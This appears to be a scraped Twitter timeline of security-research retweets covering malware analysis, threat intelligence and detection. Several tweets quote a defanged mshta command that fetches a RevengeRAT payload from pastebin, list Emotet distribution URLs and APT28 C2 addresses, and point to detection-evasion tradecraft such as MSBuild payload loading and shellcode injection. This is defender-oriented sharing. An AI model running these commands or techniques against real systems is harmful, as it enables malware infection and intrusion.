Tweetovi
- Tweetovi, trenutna stranica.
- Tweetovi i odgovori
- Medijski sadržaj
Blokirali ste korisnika/cu @_devonkerr_
Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @_devonkerr_
-
Devon Kerr proslijedio/la je Tweet
Inspired by awesome people, last year I made a cheatsheet for measuring CTI aspects. This year I've moved it to github, tweaked the sheet a bit and updated ito make it easier to maintain for both myself & you folks. Expect more content on CTI & RT. Cheers! https://github.com/gertjanbruggink/Metrics …https://twitter.com/gertjanbruggink/status/1126434409383714816 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Devon Kerr proslijedio/la je Tweet
A genealogy of 10 malware EXEs that share code - and one that doesn't belong - visualized. The rows are individual samples, and the color-blocks are their functions. A somewhat complicated algorithm is used to draw a plausible evolutionary lineage. Work from my CyberGenome days.pic.twitter.com/dN5ftANvWZ
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Devon Kerr proslijedio/la je Tweet
Load encrypted PE from XML Attribute. MSBuild is still the best.
https://github.com/XwingAngel/PELoader/ …
MSBuild sets Property then calls Execute.
Use this example to decouple payloads & prove that all security products have a "Single File Bias".
Decouple payloads to subvert detection.pic.twitter.com/648rujlLQn
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Devon Kerr proslijedio/la je Tweet
Quick visual on triaging a multi-stage payload starting with a persistent scheduled task launching: mshta http:\\pastebin[.]com\raw\JF0Zjp3g
note: simple backslash URL trick
know: "4D 5A" (MZ)
Result:
#RevengeRAT on https://paste[.]ee/r/OaKTX C2: cugugugu.duckdns[.]orgpic.twitter.com/FCzsRaI9Ve
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Devon Kerr proslijedio/la je Tweet
New Twist on an older technique MD5: 4b82f1de393a07aa9ba91d046e2fd6b0 Execute Assembly via System.Runtime.InteropServices.RegistrationServices.UnregisterAssembly. Basically just Another Way to Call Instead of CreateInstance. There is more here but that was fun.pic.twitter.com/PEa7VaLf5A
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Devon Kerr proslijedio/la je Tweet
[Educational] One of the best blog posts that I ever read about going from 0 to unauth RCE in f**king Mikrotik OS step by step:https://medium.com/@maxi./finding-and-exploiting-cve-2018-7445-f3103f163cc1 …
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Devon Kerr proslijedio/la je TweetHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
Devon Kerr proslijedio/la je Tweet
IOCs, the decompiled C# code with deobfuscated strings, a registry data config decrypter (for those who are infected) and some information of the Project TajMahal malware sample uploaded in 2019 to Virustotal: https://github.com/TheEnergyStory/malware_analysis/tree/master/TajMahal …
#TajMahal#MalwareHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Devon Kerr proslijedio/la je Tweet
interesting sample, using minimal macro to write to startup folder for persistence & uses IE via COM to download 2 txt files (no noisy ps or abnormal exec). https://app.any.run/tasks/866b7e6a-4657-4a1f-bba9-44bfb42b7390/ …pic.twitter.com/NPlTC35ZeH
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Devon Kerr proslijedio/la je Tweet
In this new
#analysis, Insikt Group assesses that repeated communications from a targeted European energy sector mail server to a PupyRAT C2 are sufficient to indicate a likely intrusion: http://bit.ly/3aGCPVd#Cybersecuritypic.twitter.com/R2ZLqBergk
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Devon Kerr proslijedio/la je Tweet
New
#emotet Epoch 2 urls //www.divyapushti.org/wp-admin/cmLoLV/ //www.lespianosduvexin.fr/revslider0/htr/ //csdnshop.com/wp-admin/0kuev1/ //chihuitest.bodait.com/cgi-bin/krh/ s://studiodentistico-candeo.it/wp-content/hF/Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Devon Kerr proslijedio/la je Tweet
When I come across a new thing in
#DFIR that I'm trying to understand,#CyberChef is one of my go-to tools.#DailyDFIR 20: Check out@mattnotmax's list of great CyberChef
recipes for insight (and inspiration!) on what that great tool can do:
https://github.com/mattnotmax/cyberchef-recipes …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Devon Kerr proslijedio/la je Tweet
This article explains it well. http://www.godevtool.com/Other/pdb.htm
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Devon Kerr proslijedio/la je Tweet
I recently updated Get-PE in PowerShellArsenal to parse out the debug directory so that PDB strings can be extracted programmatically. I did it because
@harmj0y needed to confirm the absence of debug strings as one of many post-build OPSEC checks. Dude is master operator.
pic.twitter.com/Ni738eczqk
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Devon Kerr proslijedio/la je Tweet
Because some people asked, here’s APT28 infra from October till now. They setup around 2-3 C2s a month. 184.95.51.172 2020-01
78.142.19.114 2019-12
80.255.3.116 2019-12
193.70.80.214 2019-11
185.141.63.103 2019-11
109.169.15.73 2019-10
178.32.251.98 2019-10
https://twitter.com/ydklijnsma/status/1218404034647863297 …
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Devon Kerr proslijedio/la je Tweet
How to help?
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Devon Kerr proslijedio/la je Tweet
#detection learned lessons here are: a) alert on file writes to startup folder by office processes (not noisy) b) monitor continuous network connections from cscript.exePrikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Devon Kerr proslijedio/la je Tweet
"
#ShadowMove: a Stealthy Lateral Movement Strategy" is now available to read Read if interested to see a new practical lateral movement https://usenix.org/conference/usenixsecurity20/presentation/niakanlahiji … Demo (TDS (MS SQL) & FTP): https://uofi.app.box.com/folder/93023403411 … Prototype will be released soon@MITREattack@USENIXSecurityPrikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Devon Kerr proslijedio/la je Tweet
I spent some time learning about blockdlls and parent process spoofing from
@_RastaMouse and@_xpn_ . Using a recent sample from SubTee, I modified it to spoof the parent process and inject x64 shellcode from a dll on UNC into hidden iexplore.exe. https://gist.github.com/rvrsh3ll/54088dcd81a09e99421a8c5692124705 …pic.twitter.com/V93FAn6iIFHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Devon Kerr proslijedio/la je Tweet
Fun fact for the day: IntegrityLevel within process creation events provides context to detection opportunities. Example: Open powershell as administrator, the integrity is "High". Processes running under that process will now be high as well. (1/5)
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.